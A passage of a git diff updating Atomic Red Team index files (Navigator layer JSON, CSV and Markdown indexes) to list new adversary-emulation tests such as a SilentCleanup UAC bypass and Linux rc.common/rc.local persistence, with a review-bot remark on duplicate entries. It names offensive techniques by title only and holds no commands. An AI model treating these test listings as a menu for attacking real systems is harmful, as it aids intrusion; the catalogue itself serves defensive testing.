diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
index 31d2834b..fbe9e18a 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
@@ -1 +1 @@
-{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID"
:"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"
T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]}
\ No newline at end of file
+{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID"
:"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"
T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]}
\ No newline at end of file
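Review bot: The regenerated layer on the `+` line still carries duplicate entries in `techniques` — `{"techniqueID":"T1027","score":100,"enabled":true}` appears twice (once after `T1027.001`, again after `T1027.002`) and `{"techniqueID":"T1048","score":100,"enabled":true}` appears twice after `T1048.003` — so a defect already present on the `-` line survives the rebuild. A Navigator layer needs at most one object per `techniqueID` (optionally per tactic), and how a consumer resolves two identical entries is parser-dependent, so the duplicates are redundant at best and can skew any score aggregation done on the layer; since this file looks generated, the dedupe on `techniqueID` presumably belongs in the index generator rather than in hand edits here. The new side also still ends without a trailing newline (`\ No newline at end of file`), which the same generator could emit to keep the file diff-friendly.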
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index e84bab59..fda6082f 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -118,6 +118,7 @@ privilege-escalation,T1548.002,Bypass User Account Control,5,Bypass UAC using Co
privilege-escalation,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
privilege-escalation,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -159,6 +160,8 @@ privilege-escalation,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4
privilege-escalation,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
privilege-escalation,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
privilege-escalation,T1037.004,RC Scripts,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
+privilege-escalation,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
+privilege-escalation,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
privilege-escalation,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual
privilege-escalation,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt
@@ -215,6 +218,7 @@ defense-evasion,T1548.002,Bypass User Account Control,5,Bypass UAC using Compute
defense-evasion,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
defense-evasion,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
@@ -534,6 +538,8 @@ persistence,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a
persistence,T1547.010,Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt
persistence,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
persistence,T1037.004,RC Scripts,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
+persistence,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
+persistence,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
persistence,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual
persistence,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
persistence,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt
@@ -618,6 +624,7 @@ discovery,T1087.002,Domain Account,6,Adfind - Enumerate Active Directory Admins,
discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Objects,e1ec8d20-509a-4b9a-b820-06c9b2da8eb7,command_prompt
discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt
discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt
+discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell
discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv
index d4e71a68..89eb46ca 100644
--- a/atomics/Indexes/Indexes-CSV/linux-index.csv
+++ b/atomics/Indexes/Indexes-CSV/linux-index.csv
@@ -32,6 +32,8 @@ privilege-escalation,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injecti
privilege-escalation,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter container escape,0b2f9520-a17a-4671-9dba-3bd034099fff,sh
privilege-escalation,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
+privilege-escalation,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
+privilege-escalation,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
privilege-escalation,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
privilege-escalation,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
privilege-escalation,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
@@ -157,6 +159,8 @@ persistence,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD
persistence,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
persistence,T1136.001,Local Account,1,Create a user account on a Linux system,40d8eabd-e394-46f6-8785-b9bfa1d011d2,bash
persistence,T1136.001,Local Account,5,Create a new user in Linux with `root` UID and GID.,a1040a30-d28b-4eda-bd99-bb2861a4616c,bash
+persistence,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
+persistence,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
persistence,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
persistence,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index e3a45879..5d54166f 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -85,6 +85,7 @@ privilege-escalation,T1548.002,Bypass User Account Control,5,Bypass UAC using Co
privilege-escalation,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
privilege-escalation,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -151,6 +152,7 @@ defense-evasion,T1548.002,Bypass User Account Control,5,Bypass UAC using Compute
defense-evasion,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
defense-evasion,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
@@ -436,6 +438,7 @@ discovery,T1087.002,Domain Account,6,Adfind - Enumerate Active Directory Admins,
discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Objects,e1ec8d20-509a-4b9a-b820-06c9b2da8eb7,command_prompt
discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt
discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt
+discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell
discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 3a916e39..e7646cfb 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -227,6 +227,7 @@
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- Atomic Test #8: Disable UAC using reg.exe [windows]
+ - Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -323,6 +324,8 @@
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1037.004 RC Scripts](../../T1037.004/T1037.004.md)
- Atomic Test #1: rc.common [macos]
+ - Atomic Test #2: rc.common [linux]
+ - Atomic Test #3: rc.local [linux]
- [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md)
- Atomic Test #1: Re-Opened Applications [macos]
- Atomic Test #2: Re-Opened Applications [macos]
@@ -417,6 +420,7 @@
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- Atomic Test #8: Disable UAC using reg.exe [windows]
+ - Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
- [T1218.003 CMSTP](../../T1218.003/T1218.003.md)
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
@@ -965,6 +969,8 @@
- T1547.012 Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1037.004 RC Scripts](../../T1037.004/T1037.004.md)
- Atomic Test #1: rc.common [macos]
+ - Atomic Test #2: rc.common [linux]
+ - Atomic Test #3: rc.local [linux]
- T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md)
- Atomic Test #1: Re-Opened Applications [macos]
@@ -1119,6 +1125,7 @@
- Atomic Test #7: Adfind - Enumerate Active Directory User Objects [windows]
- Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows]
- Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows]
+ - Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows]
- [T1069.002 Domain Groups](../../T1069.002/T1069.002.md)
- Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
- Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md
index d1576879..6499f682 100644
--- a/atomics/Indexes/Indexes-Markdown/linux-index.md
+++ b/atomics/Indexes/Indexes-Markdown/linux-index.md
@@ -122,7 +122,9 @@
- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055 Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1037.004 RC Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1037.004 RC Scripts](../../T1037.004/T1037.004.md)
+ - Atomic Test #2: rc.common [linux]
+ - Atomic Test #3: rc.local [linux]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1548.001 Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
@@ -451,7 +453,9 @@
- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1037.004 RC Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1037.004 RC Scripts](../../T1037.004/T1037.004.md)
+ - Atomic Test #2: rc.common [linux]
+ - Atomic Test #3: rc.local [linux]
- T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 6433b60d..5b6382dc 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -178,6 +178,7 @@
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- Atomic Test #8: Disable UAC using reg.exe [windows]
+ - Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -308,6 +309,7 @@
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- Atomic Test #8: Disable UAC using reg.exe [windows]
+ - Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
- [T1218.003 CMSTP](../../T1218.003/T1218.003.md)
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
@@ -818,6 +820,7 @@
- Atomic Test #7: Adfind - Enumerate Active Directory User Objects [windows]
